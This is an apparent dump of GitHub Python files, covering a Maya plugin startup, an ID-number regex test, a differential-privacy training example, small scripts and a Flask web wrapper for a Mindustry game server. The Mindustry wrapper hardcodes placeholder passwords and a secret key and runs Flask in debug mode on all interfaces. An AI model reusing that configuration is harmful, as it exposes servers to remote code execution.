\"\"\"\n\n root_file_path = path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\n package = manager.package_from_path(root_file_path)\n if not package:\n raise bootstrap_exceptions.MissingPackage(package)\n\n logger = setup_logging()\n\n logger.info('Loading tp-dcc DCC Package: Maya')\n\n resources_path = path.join_path(os.path.dirname(root_file_path), 'resources')\n resources.register_resource(resources_path)\n dcc.register_resource_path(resources_path)\n\n try:\n if env.is_mayapy() or env.is_maya_batch():\n logger.debug('Not in maya.exe, skipping tp-dcc-tools menu loading...')\n else:\n from tp.core.managers import tools\n tools.ToolsManager.load(application_name='maya')\n logger.debug('Finished loading tp-dcc-tools framework Maya tools!')\n except Exception:\n logger.error('Failed to load tp-dcc-tools framework Maya tools due to unknown error', exc_info=True)\n\n # load tp-dcc-maya plugins\n loader.load_all_plugins()\n\n # initialize metadata manager\n base.MetaRegistry()\n\n # setup custom marking menu and callbacks\n markingmenuoverride.setup()\n triggercallbacks.create_selection_callback()\n\n # # setup scene manager\n # scene.SceneManager()\n\n\ndef shutdown(package: Package):\n \"\"\"\n Shutdown function that is called during tpDcc framework shutdown.\n This function is called at the end of tpDcc framework shutdown.\n\n :param Package package: package instance.\n \"\"\"\n\n if not package:\n raise bootstrap_exceptions.MissingPackage(package)\n\n logger = log.tpLogger\n\n logger.info('Shutting down tp-dcc-maya Package...')\n\n # # unload scene manager\n # scene.SceneManager().stop_all_jobs()\n\n # reset custom marking menu\n triggercallbacks.remove_selection_callback()\n markingmenuoverride.reset()\n\n # unload tp-dcc-maya plugins\n loader.unload_all_plugins()\n\n if env.is_maya():\n from tp.core.managers import tools\n try:\n tools.ToolsManager.close()\n except Exception:\n logger.error('Failed to shutdown currently loaded tools', exc_info=True)\n\n cmds.flushUndo()\n\n\ndef setup_logging():\n \"\"\"\n Setup custom Maya logging\n \"\"\"\n\n handler = MayaLogHandler()\n handler.setFormatter(logging.Formatter(log.LogsManager().shell_formatter))\n log.tpLogger.addHandler(handler)\n log.rigLogger.addHandler(handler)\n log.animLogger.addHandler(handler)\n log.modelLogger.addHandler(handler)\n\n return log.tpLogger\n\n\nclass MayaLogHandler(logging.Handler):\n \"\"\"\n Custom logging handler that displays errors and warnings records with the appropriate color within Maya GUI\n \"\"\"\n\n def emit(self, record: logging.LogRecord) -> None:\n msg = self.format(record)\n if record.levelno > logging.WARNING:\n OpenMaya.MGlobal.displayWarning(msg)\n elif record.levelno in (logging.CRITICAL, logging.ERROR):\n OpenMaya.MGlobal.displayError(msg)\n else:\n # Write all messages to sys.__stdout__, which goes to the output window. Only write debug messages here.\n # The script editor is incredibly slow and can easily hang Maya if we have a lot of debug logging on,\n # but the output window is reasonably fast.\n sys.__stdout__.write(f'{msg}\\n')\n","repo_name":"tpoveda/tp-dcc-tools","sub_path":"packages/tp-dcc-maya/startup/tpmaya.py","file_name":"tpmaya.py","file_ext":"py","file_size_in_byte":4320,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"40"} +{"seq_id":"19880421797","text":"# 测试18位的身份证号\nimport re\nimport time\nimport datetime\n\nclass JudgeRegExpOf18IDCardNumber:\n def __init__(self):\n self.year = 1800 # 年\n self.month = 1 # 月\n self.date = 1 # 日\n self.bigMonth = [1, 3, 5, 7, 8, 10, 12] # 大月\n self.samllMonth = [4, 6, 9, 11] # 小月\n self.judgeString = \"18000100\"\n self.ID = \"0000180001000000\"\n self.numOfJudgeWrong = 0\n self.numofWrongDate = 0\n self.numofAll = 0\n # 由于数据量过于庞大,删了,只测试 452722\n # self.preffixs=[str(preffix).zfill(6) for preffix in range(1000000)] #身份证号前六位\n # 身份证号码后四位\n self.suffixs = [str(suffix).zfill(4) for suffix in range(10000)]+[str(suffix).zfill(\n 3)+'X' for suffix in range(1000)]+[str(suffix).zfill(3)+'x' for suffix in range(1000)]\n self.file = open(\"./input18.txt\", 'a') # 打开文件\n self.judge = None\n # 编译正则\n self.pattern = re.compile(\n r'^[1-9]\\d{5}((18|19|20|21)([0-9]{2}))(02(0[1-9]|[1-2][0-9])|(01|03|05|07|08|10|12)(0[1-9]|[1-2][0-9]|3[0-1])|(04|06|09|11)(0[1-9]|[1-2][0-9]|30))\\d{3}[Xx\\d]$')\n\n def addSelf(self): # 日期向前加1\n self.date += 1\n\n def generateRightDate(self): # 这是生成正确的日期\n if self.month == 2:\n if self.judgeYear():\n if self.date > 29:\n self.date = 1\n self.month += 1\n else:\n if(self.date > 28):\n self.date = 1\n self.month += 1\n elif (self.month in self.bigMonth):\n if(self.date > 31):\n self.date = 1\n self.month += 1\n elif self.month in self.samllMonth:\n if self.date > 30:\n self.date = 1\n self.month += 1\n if self.month > 12:\n self.month = 1\n self.year += 1\n return\n\n def generateAllDate(self): # 生成所有的日期\n if(self.date > 31):\n self.month += 1\n self.date = 0\n if(self.month > 12):\n self.year += 1\n self.month = 1\n return\n # 闰年判断\n\n def judgeYear(self):\n if((self.year % 400 == 0) or ((self.year % 100 != 0) and (self.year % 4 == 0))):\n return True\n else:\n return False\n\n def print(self):\n print(str(self.year)+' '+str(self.month).zfill(2) +\n \" \"+str(self.date).zfill(2))\n return\n\n def getString(self):\n return str(self.year).zfill(4)+str(self.month).zfill(2)+str(self.date).zfill(2)\n\n def judgeStop(self):\n if self.year >= 2200:\n exit(0)\n\n def resetDate(self):\n self.year = 1800\n self.month = 1\n self.date = 0\n\n def validateDate(self):\n if(self.month == 2):\n if self.date < 30 and self.date != 0:\n return True\n else:\n return False\n elif self.month in self.bigMonth:\n if self.date < 32 and self.date != 0:\n return True\n else:\n return False\n elif self.month in self.samllMonth:\n if self.date < 31 and self.date != 0:\n return True\n else:\n return False\n\n def run(self):\n # 由于测试数据过多,我们只进行分段测试,也就是前六位做一段,7-14位一段 15-18位一段\n #又由于实际,我只是测试了7-14年和日期这一段,你也可以补充加入别的测试内容,但是要注意测试的内存占用和运行时间。\n while(self.year < 2200):\n if not self.validateDate():\n self.numofWrongDate += 1\n self.numofAll += 1\n self.ID = \"452722\"+self.getString()+\"0000\"\n self.judge = self.pattern.match(self.ID)\n if self.judge == None:\n self.numOfJudgeWrong += 1\n # self.file.write(self.ID+'\\n')\n self.addSelf()\n self.generateAllDate()\n # self.resetDate()\n self.file.write(\"总数:\"+str(self.numofAll) +\n \" 判断错误数:\"+str(self.numOfJudgeWrong)+\" 事实错误数:\"+str(self.numofWrongDate)+\"\\n\")\n self.file.close()\n\n\nprint(\"开始测试......\")\ntest = JudgeRegExpOf18IDCardNumber()\nstart = time.time()\ntest.run()\nend = time.time()\nperiod = (end-start)\nprint(\"测试结束,共计用时\"+str(period)+\"s。\")\n","repo_name":"zerotower69/javascript-html-css","sub_path":"day03/测试文件/test18.py","file_name":"test18.py","file_ext":"py","file_size_in_byte":4559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35916786774","text":"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\n\nimport numpy as np\nimport numpy.random as npr\nimport tensorflow as tf\n\nfrom tensorflow_privacy.privacy.analysis import privacy_ledger\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import compute_rdp_from_ledger\nfrom tensorflow_privacy.privacy.analysis.rdp_accountant import get_privacy_spent\nfrom tensorflow_privacy.privacy.optimizers import dp_optimizer\n\nAdamOptimizer = tf.compat.v1.train.AdamOptimizer\n\nFLAGS = flags.FLAGS\n\nflags.DEFINE_boolean(\n 'dpsgd', True, 'If True, train with DP-SGD. If False, '\n 'train with vanilla SGD.')\nflags.DEFINE_float('learning_rate', .05, 'Learning rate for training')\nflags.DEFINE_float('noise_multiplier', 2.0,\n 'Ratio of the standard deviation to the clipping norm')\nflags.DEFINE_float('l2_norm_clip', 1.0, 'Clipping norm')\nflags.DEFINE_integer('batch_size', 64, 'Batch size')\nflags.DEFINE_integer('epochs', 2, 'Number of epochs')\nflags.DEFINE_integer('training_data_size', 2000, 'Training data size')\nflags.DEFINE_integer('test_data_size', 2000, 'Test data size')\nflags.DEFINE_integer('input_dimension', 5, 'Input dimension')\nflags.DEFINE_string('model_dir', None, 'Model directory')\n\n\nclass EpsilonPrintingTrainingHook(tf.estimator.SessionRunHook):\n \"\"\"Training hook to print current value of epsilon after an epoch.\"\"\"\n\n def __init__(self, ledger):\n \"\"\"Initalizes the EpsilonPrintingTrainingHook.\n Args:\n ledger: The privacy ledger.\n \"\"\"\n self._samples, self._queries = ledger.get_unformatted_ledger()\n\n def end(self, session):\n orders = [1 + x / 10.0 for x in range(1, 100)] + list(range(12, 64))\n samples = session.run(self._samples)\n queries = session.run(self._queries)\n formatted_ledger = privacy_ledger.format_ledger(samples, queries)\n rdp = compute_rdp_from_ledger(formatted_ledger, orders)\n eps = get_privacy_spent(orders, rdp, target_delta=1e-5)[0]\n print('For delta=1e-5, the current epsilon is: %.2f' % eps)\n\n\ndef lr_model_fn(features, labels, mode):\n \"\"\"Model function for a LR.\"\"\"\n\n # Define logistic regression model using tf.keras.layers.\n logits = tf.keras.layers.Dense(2).apply(features['x'])\n\n # Calculate loss as a vector (to support microbatches in DP-SGD).\n vector_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(\n labels=labels, logits=logits)\n # Define mean of loss across minibatch (for reporting through tf.Estimator).\n scalar_loss = tf.reduce_mean(input_tensor=vector_loss)\n\n # Configure the training op (for TRAIN mode).\n if mode == tf.estimator.ModeKeys.TRAIN:\n\n if FLAGS.dpsgd:\n ledger = privacy_ledger.PrivacyLedger(\n population_size=FLAGS.training_data_size,\n selection_probability=(FLAGS.batch_size / FLAGS.training_data_size))\n\n # Use DP version of AdamOptimizer. Other optimizers are\n # available in dp_optimizer. Most optimizers inheriting from\n # tf.train.Optimizer should be wrappable in differentially private\n # counterparts by calling dp_optimizer.optimizer_from_args().\n # Setting num_microbatches to None is necessary for DP and\n # per-example gradients\n optimizer = dp_optimizer.DPAdamGaussianOptimizer(\n l2_norm_clip=FLAGS.l2_norm_clip,\n noise_multiplier=FLAGS.noise_multiplier,\n num_microbatches=None,\n ledger=ledger,\n learning_rate=FLAGS.learning_rate)\n training_hooks = [\n EpsilonPrintingTrainingHook(ledger)\n ]\n opt_loss = vector_loss\n else:\n optimizer = AdamOptimizer(learning_rate=FLAGS.learning_rate)\n training_hooks = []\n opt_loss = scalar_loss\n global_step = tf.compat.v1.train.get_global_step()\n train_op = optimizer.minimize(loss=opt_loss, global_step=global_step)\n # In the following, we pass the mean of the loss (scalar_loss) rather than\n # the vector_loss because tf.estimator requires a scalar loss. This is only\n # used for evaluation and debugging by tf.estimator. The actual loss being\n # minimized is opt_loss defined above and passed to optimizer.minimize().\n return tf.estimator.EstimatorSpec(mode=mode,\n loss=scalar_loss,\n train_op=train_op,\n training_hooks=training_hooks)\n\n # Add evaluation metrics (for EVAL mode).\n elif mode == tf.estimator.ModeKeys.EVAL:\n eval_metric_ops = {\n 'accuracy':\n tf.compat.v1.metrics.accuracy(\n labels=labels,\n predictions=tf.argmax(input=logits, axis=1))\n }\n\n return tf.estimator.EstimatorSpec(mode=mode,\n loss=scalar_loss,\n eval_metric_ops=eval_metric_ops)\n\ndef generate_data():\n npr.seed(4242)\n N_train = FLAGS.training_data_size\n N_test = FLAGS.test_data_size\n N = N_train + N_test\n X0 = npr.randn(N, FLAGS.input_dimension)\n temp = X0 @ npr.randn(FLAGS.input_dimension, 1) + npr.randn(N, 1)\n Y0 = np.round(1/(1+np.exp(-temp)))\n\n train_X = X0[0:N_train, :]\n test_X = X0[N_train:N, :]\n train_Y = Y0[0:N_train, 0]\n test_Y = Y0[N_train:N, 0]\n train_X = np.array(train_X, dtype=np.float32)\n test_X = np.array(test_X, dtype=np.float32)\n train_Y = np.array(train_Y, dtype=np.int32)\n test_Y = np.array(test_Y, dtype=np.int32)\n return train_X, train_Y, test_X, test_Y\n\ndef main(unused_argv):\n tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)\n\n # Load training and test data.\n train_data, train_labels, test_data, test_labels = generate_data()\n\n # Instantiate the tf.Estimator.\n lr_classifier = tf.estimator.Estimator(model_fn=lr_model_fn,\n model_dir=FLAGS.model_dir)\n\n # Create tf.Estimator input functions for the training and test data.\n train_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(\n x={'x': train_data},\n y=train_labels,\n batch_size=FLAGS.batch_size,\n num_epochs=FLAGS.epochs,\n shuffle=True)\n eval_input_fn = tf.compat.v1.estimator.inputs.numpy_input_fn(\n x={'x': test_data},\n y=test_labels,\n num_epochs=1,\n shuffle=False)\n\n # Training loop.\n steps_per_epoch = FLAGS.training_data_size // FLAGS.batch_size / 10\n for epoch in range(1, 10*FLAGS.epochs + 1):\n # Train the model for one epoch.\n lr_classifier.train(input_fn=train_input_fn, steps=steps_per_epoch)\n\n # Evaluate the model and print results\n eval_results = lr_classifier.evaluate(input_fn=eval_input_fn)\n test_accuracy = eval_results['accuracy']\n if (epoch % 5 == 0):\n print('Test accuracy after %.1f epochs is: %.3f' % (epoch/10, test_accuracy))\n\nif __name__ == '__main__':\n app.run(main)\n ","repo_name":"Djiffit/TML","sub_path":"2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":6824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35195686545","text":"import sys\nfrom PIL import Image\nfrom os import walk\nimport re\nimport fnmatch\nimport time\nimport os\n\nimage_files = []\n\next_filter = ['*.png']\nregex_filter = r'|'.join([fnmatch.translate(x) for x in ext_filter])\n\nfor (dirpath, dirnames, filenames) in walk(\".\"):\n\tfilenames[:] = [fname for fname in filenames if re.match(regex_filter, fname)]\n\timage_files.extend(filenames)\n\n#print(image_files)\n\nimages = map(Image.open, image_files)\nwidths, heights = zip(*(i.size for i in images))\n\ntotal_width = sum(widths)\nmax_height = max(heights)\n\nnew_im = Image.new('RGB', (total_width, max_height))\n\nx_offset = 0\nfor im in images:\n new_im.paste(im, (x_offset,0))\n x_offset += im.size[0]\n\n\ncurr_time = int(round(time.time() * 1000))\nsprite_dir = \"sprite_%s\" % (curr_time)\nsprite_filepath = \"%s/sprite.jpg\" % (sprite_dir)\n\nos.mkdir(sprite_dir)\nnew_im.save(sprite_filepath)\n\nprint(\"Done, sprite stored at %s\" % (sprite_filepath))\n","repo_name":"selvan/sprite_gen","sub_path":"gen_sprite.py","file_name":"gen_sprite.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9125016165","text":"'''\nGuided Backpropogation\n'''\n\n# Imports\nfrom Model import *\n\n# Main Functions\n# Test Model and print test loss and accuracy on a input model @ Karthikeyan S CS21M028\ndef TestModel_RunTest(MODEL, X_shape=(227, 227, 3), Y_shape=10):\n '''\n Test the model and display loss and accuracy\n '''\n DATASET_PATH_INATURALIST_TEST = os.path.join(DATASET_PATH_INATURALIST, \"val\")\n # Load Test Dataset\n DATASET_TEST = LoadTestDataset_INaturalist(\n DATASET_PATH_INATURALIST_TEST, \n img_size=tuple(X_shape[:2]), batch_size=128, \n shuffle=True\n )\n # Test Model\n loss_test, eval_test = Model_Test(MODEL, DATASET_TEST)\n print(\"MODEL TEST:\")\n print(\"Loss:\", loss_test)\n print(\"Accuracy:\", eval_test)\n\n# Run\n# Params\n\n# Params\n\n# Run","repo_name":"KausikN/MTech_DL_Assignments","sub_path":"Assignment_2/TestModel.py","file_name":"TestModel.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8767377973","text":"import urllib.request\nimport urllib.parse\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Usage: python script.py \")\n sys.exit(1)\n\nurl = sys.argv[1]\nemail = sys.argv[2]\n\n# Prepare data to be sent in the POST request\ndata = urllib.parse.urlencode({'email': email}).encode('utf-8')\n\ntry:\n # Send POST request\n with urllib.request.urlopen(url, data) as response:\n content = response.read().decode('utf-8')\n print(\"Body response:\")\n print(\"\\t- type:\", type(content))\n print(\"\\t- content:\", content)\n\nexcept urllib.error.HTTPError as e:\n print(\"HTTP Error:\", e)\nexcept urllib.error.URLError as e:\n print(\"URL Error:\", e)\n\n","repo_name":"YASSINEBOUTAYEB1/alx-higher_level_programming","sub_path":"0x11-python-network_1/2-post_email.py","file_name":"2-post_email.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34063893251","text":"import heapq\nimport sys\n\nsys.stdin = open(\"D:\\code\\ps-practice\\input.txt\", \"r\")\n\nn = int(input())\nlecture = []\nfor _ in range(n):\n lecture.append(list(map(int, input().split())))\n\nlecture.sort(key=lambda x: (-x[1]))\nmax_p_heap = []\ntoday = 0\nanswer = 0\nfor i in range(n):\n p, d = lecture[i] # p(비용), d(날짜)\n if d != today:\n for _ in range(today - d - 1): # 20일 -> 18일 일 때 19일도 고려해야함\n if max_p_heap:\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n else:\n break\n heapq.heappush(max_p_heap, -p)\n if i == n-1 or lecture[i+1][1] != d:\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n elif d == today:\n heapq.heappush(max_p_heap, -p)\n if i == n-1 or lecture[i+1][1] != d:\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n today = d\n# 현재 날짜가 1이 아닌 경우 힙큐에 들어있는 강연을 첫째날이 될때까지 하나씩 할 수 있음\nwhile today > 1:\n today -= 1\n if not max_p_heap:\n break\n n_p = -heapq.heappop(max_p_heap)\n answer += n_p\n\nprint(answer)\n","repo_name":"gaeunpark924/algorithm-study-python","sub_path":"2022/11월4주차/순회강연.py","file_name":"순회강연.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"2838219922","text":"import random\r\n\r\nweapons = [1, 2, 3]\r\ncomp_action = random.randint(0, 2)\r\nplayer = False\r\n\r\n\r\nwhile not player:\r\n\r\n player_action = int(input(\"\\nEnter your weapon ([1]rock, [2]paper, [3]scissors): \"))\r\n\r\n if player_action == weapons[0]:\r\n player_action = \"rock\"\r\n elif player_action == weapons[1]:\r\n player_action = \"paper\"\r\n elif player_action == weapons[2]:\r\n player_action = \"scissors\"\r\n else:\r\n print(\"No match! Choose correct weapon.\")\r\n\r\n if comp_action == 0:\r\n comp_action = \"rock\"\r\n elif comp_action == 1:\r\n comp_action = \"paper\"\r\n elif comp_action == 2:\r\n comp_action = \"scissors\"\r\n\r\n print(f\"\\nYou chose {player_action}, computer chose {comp_action}.\\n\")\r\n\r\n if player_action == comp_action:\r\n print(f\"Both players selected {player_action}. It's a tie!\")\r\n elif player_action == \"rock\":\r\n if comp_action == \"scissors\":\r\n print(\"Rock smashes scissors! You win!\")\r\n else:\r\n print(\"Paper covers rock! You lose.\")\r\n elif player_action == \"paper\":\r\n if comp_action == \"rock\":\r\n print(\"Paper covers rock! You win!\")\r\n else:\r\n print(\"Scissors cuts paper! You lose.\")\r\n elif player_action == \"scissors\":\r\n if comp_action == \"paper\":\r\n print(\"Scissors cuts paper! You win!\")\r\n else:\r\n print(\"Rock smashes scissors! You lose.\")\r\n\r\n new_game = input(\"\\nDo you want another game? (y/n): \")\r\n if new_game == \"y\":\r\n player = False\r\n else:\r\n print(\"Thank you!\")\r\n break","repo_name":"noliverh/CLMITS_ACITIVITIES","sub_path":"jack_n_poy.py","file_name":"jack_n_poy.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13958408165","text":"import flask\nfrom flask import render_template, abort, redirect, request, make_response, send_file, g, session, flash\nimport os, socket, subprocess, time, re\n\n# START CONFIG HERE\n\n# Path the the mindustry server jar file\njar_path=\"/path/to/server-release.jar\"\n\n# Path to java\njava_path=\"/usr/bin/java\"\n\n# Display name of the server\nserverName = \"Mindustry Server\"\n# Description for the server\ndesc=\"A private server for friends.\"\n\n# Memory limit when running server. Useful for limited available memory\nmemoryLimit=\"-Xmx200M\"\n\n# Maximum amount of saved server interactions\nmaxConvoLen=20\n\n# User accounts on the server\naccounts = {\n \"admin\": { # username\n \"password\": \"PASSWORD_CHANGE_ME_PLEASE\", # Password for the account\n # Commands the account can run\n \"allowedCommands\": [\"pause\", \"host\", \"stop\", \"load\", \"save\", \"whitelist\", \"reloadmaps\", \"gameover\", \"status\"],\n # Save slots the account is allowed to use\n \"allowedSlots\": [\"slot0\", \"slot1\", \"slot2\", \"admin slot\"],\n # Whether if the account is allowed to run arbitrary mindustry commands.\n # It is strongly recommended to not enable this UNLESS you:\n # 1. Trust this server code to be secure\n # 2. Trust the mindustry source code to be secure\n # 3. Trust this user\n # Otherwise, they may be able to arbitrarily execute commands and potentially compromise the server\n \"allowArbitraryCommands\": False,\n # If the user is allowed to see the full saved history of server interactions, up to the maxConvoLen\n \"seeFullHistory\": True,\n },\n \"trustedInvitee\": {\n \"password\": \"PASSWORD_CHANGE_ME_PLEASE\",\n \"allowedCommands\": [\"pause\", \"host\", \"stop\", \"load\", \"save\", \"whitelist\"],\n \"allowedSlots\": [\"slot0\", \"slot1\", \"slot2\"],\n \"allowArbitraryCommands\": False,\n \"seeFullHistory\": False,\n },\n \"untrustedInvitee\": {\n \"password\": \"PASSWORD_CHANGE_ME_PLEASE\",\n \"allowedCommands\": [\"pause\", \"host\", \"stop\", \"load\",],\n \"allowedSlots\": [\"slot0\"],\n \"allowArbitraryCommands\": False,\n \"seeFullHistory\": False,\n },\n}\nsecret_key=\"CHANGEMETOO\"\n# END CONFIG HERE\n\nif jar_path == \"/path/to/server-release.jar\":\n print(\"Open the server.py file to edit the configuration.\")\n exit()\n\nmindustrySocket = None\napp = flask.Flask(__name__, static_folder='assets')\napp.secret_key = secret_key\nport = int(os.getenv('PORT', 8090))\nlogHead=r\"\\[\\d\\d\\-\\d\\d\\-\\d\\d\\d\\d \\d\\d:\\d\\d:\\d\\d\\] \\[I\\]\\ \"\nconversation=[]\nconversationPointer=-1\nmaps=[]\n\ndef inputCommand(command, byUser=True):\n global conversationPointer\n mindustrySocket.sendall(command.encode()+b'\\n')\n if byUser:\n conversationPointer += 1\n return getOutput()\n\ndef getOutput():\n global conversation, conversationPointer\n newExchange = b\"\"\n while True:\n try:\n newExchange += mindustrySocket.recv(1)\n except socket.timeout:\n break\n newExchange = re.sub(r'\\x1b\\[\\d+m','',newExchange.decode())\n newExchange = newExchange\n if newExchange != \"\":\n conversationPointer -= 1\n if len(conversation) <= maxConvoLen:\n conversation.append(newExchange)\n else:\n conversation.pop(0)\n conversation.append(newExchange)\n else:\n conversationPointer -= 1\n if len(conversation) <= maxConvoLen:\n conversation.append(\"Server timed out\")\n else:\n conversation.pop(0)\n conversation.append(\"Server timed out\")\n return newExchange\n\n\ndef reloadMaps():\n global maps\n inputCommand('reloadmaps')\n mapsCommandOutput = inputCommand(\"maps all\")\n matches = re.findall(r\"(\\ *)?\\(?([A-Za-z_0-9\\ ]*)(\\.msav)?\\)?:\\ (Default|Custom) \\/ \\d+x\\d+\", mapsCommandOutput)\n maps = []\n for match in matches:\n maps.append(f\"{match[1]}\")\n\n@app.before_first_request\ndef init():\n global mindustrySocket, maps\n child = subprocess.Popen([java_path, memoryLimit, \"-jar\", jar_path], stdin=subprocess.PIPE, \n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n child.stdin.write(f'config name {serverName}\\n'.encode())\n child.stdin.write(f'config description {desc}\\n'.encode())\n child.stdin.write(b'config whitelist true\\n')\n time.sleep(10)\n mindustrySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n mindustrySocket.connect( (\"localhost\", 6859) )\n mindustrySocket.settimeout(5.0)\n\n reloadMaps()\n\n@app.route('/', methods=['GET'])\ndef home():\n username = session.get(\"username\")\n if username is None or username not in accounts.keys():\n return render_template(\"login.html\")\n return render_template(\"home.html\", maps=maps, conversation=conversation, conversationPointer=conversationPointer, accountInfo=accounts[username])\n\n@app.route('/', methods=['POST'])\ndef login():\n usernameIn = request.form.get('username')\n passwordIn = request.form.get('password')\n if usernameIn in accounts.keys() and accounts[usernameIn][\"password\"] == passwordIn:\n session[\"username\"]=usernameIn\n return render_template(\"home.html\", maps=maps, conversation=conversation, conversationPointer=conversationPointer, accountInfo=accounts[usernameIn])\n else:\n return render_template(\"login.html\")\n\ndef testLoggedIn():\n username = session.get(\"username\")\n if username is None:\n abort(403)\n\ndef testCanRun(command):\n username = session.get(\"username\")\n testLoggedIn()\n if command not in accounts[username][\"allowedCommands\"]:\n abort(403)\n\n@app.route('/actions/runCommand', methods=['POST'])\ndef runCommand():\n command = request.form.get('command')\n username = session.get(\"username\")\n testLoggedIn()\n if not accounts[username][\"allowArbitraryCommands\"]:\n abort(403)\n inputCommand(command)\n return redirect(\"/\")\n\n@app.route('/actions/pause-on', methods=['GET'])\ndef pauseStateOn():\n testCanRun(\"pause\")\n inputCommand('pause on')\n return redirect(\"/\")\n\n@app.route('/actions/pause-off', methods=['GET'])\ndef pauseStateOff():\n testCanRun(\"pause\")\n inputCommand('pause off')\n return redirect(\"/\")\n\n@app.route('/actions/save-to-slot/', methods=['GET'])\ndef saveToSlot(save_slot):\n testCanRun(\"save\")\n username = session.get(\"username\")\n if save_slot in accounts[username][\"allowedSlots\"]:\n inputCommand(f'save {save_slot}')\n return redirect(\"/\")\n\n@app.route('/actions/load-slot/', methods=['GET'])\ndef loadSlot(save_slot):\n testCanRun(\"load\")\n username = session.get(\"username\")\n if save_slot in accounts[username][\"allowedSlots\"]:\n inputCommand(f'load {save_slot}')\n return redirect(\"/\")\n\n@app.route('/actions/stop', methods=['GET'])\ndef stopGame():\n testCanRun(\"stop\")\n inputCommand(f'stop')\n return redirect(\"/\")\n\n@app.route('/actions/host', methods=['GET'])\ndef hostGame():\n testCanRun(\"host\")\n inputCommand(f'host')\n return redirect(\"/\")\n\n@app.route('/actions/host', methods=['POST'])\ndef hostGameDefined():\n testCanRun(\"host\")\n map=request.form.get('map')\n mode=request.form.get('mode')\n if map not in maps:\n abort(400)\n if mode not in [\"sandbox\", \"survival\", \"attack\", \"pvp\"]:\n abort(400)\n inputCommand(f'host {map} {mode}')\n return redirect(\"/\")\n\n@app.route('/actions/disableWhitelist', methods=['GET'])\ndef letInPlayer():\n testCanRun(\"whitelist\")\n inputCommand(\"config whitelist off\")\n return redirect(\"/\")\n\n@app.route('/actions/enableWhitelist', methods=['GET'])\ndef keepOut():\n testCanRun(\"whitelist\")\n inputCommand(\"config whitelist on\")\n return redirect(\"/\")\n\n@app.route('/actions/whitelistRecentPlayer', methods=['GET'])\ndef tempWhitelistOff():\n testCanRun(\"whitelist\")\n global conversationPointer\n recentActivity = getOutput()\n matches = re.findall(r\"([A-Za-z=\\d]{24})\", recentActivity)\n if len(matches) >= 1:\n inputCommand(f\"whitelist-add {matches[-1]}\")\n else:\n conversation.append(\"No players joining recently\")\n return redirect(\"/\")\n\n@app.route('/actions/reloadmaps', methods=['GET'])\ndef reloadMapsEndpoint():\n global maps\n testCanRun(\"reloadmaps\")\n reloadMaps()\n return redirect(\"/\")\n\n@app.route('/actions/gameover', methods=['GET'])\ndef gameover():\n testCanRun(\"gameover\")\n inputCommand('gameover')\n return redirect(\"/\")\n\n@app.route('/actions/status', methods=['GET'])\ndef status():\n testCanRun(\"status\")\n inputCommand('status')\n return redirect(\"/\")\n\n@app.route('/status', methods=['GET'])\ndef debug():\n inputCommand(\"status\")\n return redirect(\"/\")\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=port, debug=True)","repo_name":"LivelyCarpet87/Mindustry-HTTP-Wrapper","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":8705,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"36603788652","text":"import re\r\ns, m = input(), input()\r\nans = 0\r\nif s.isdigit():\r\n ans += 1\r\nif re.findall('[sS][pP][aA][mM]', m) and sum(list(map(lambda x: len(x), re.split('[\\w\\s]*', m)))) > len(m) // 2:\r\n ans += 2\r\nif ans == 0:\r\n print('Not Spam')\r\nelif ans == 1:\r\n print('Invalid Sender')\r\nelif ans == 2:\r\n print('Invalid Content')\r\nelse:\r\n print('Fully Invalid')","repo_name":"mohsendb7008/Online-Judge-Solutions","sub_path":"Quera/Spam.py","file_name":"Spam.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"29589589437","text":"import time\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.common.keys import Keys\r\n\r\ndriver = webdriver.ChromiumEdge()\r\ndriver.get(\"https://www.novaliderinformatica.com.br/computadores\")\r\ntime.sleep(3)\r\ntitulos = driver.find_elements(By.XPATH, \"//a[@class='nome-produto']\")\r\nprecos = driver.find_elements(By.XPATH, \"//strong[@class='preco-promocional']\")\r\nprodutos=[]\r\nprecosArray=[]\r\nfor titulo in titulos:\r\n produtos.append(titulo.text)\r\n\r\nfor preco in precos:\r\n precosArray.append(preco.text)\r\n\r\nfor i in range(1,len(precosArray)):\r\n print(produtos[i]+'\\n'+precosArray[i])\r\n\r\n\r\n","repo_name":"LucasMasaoK/Web-Scraping-Selenium","sub_path":"Selenium.py","file_name":"Selenium.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31865668378","text":"import 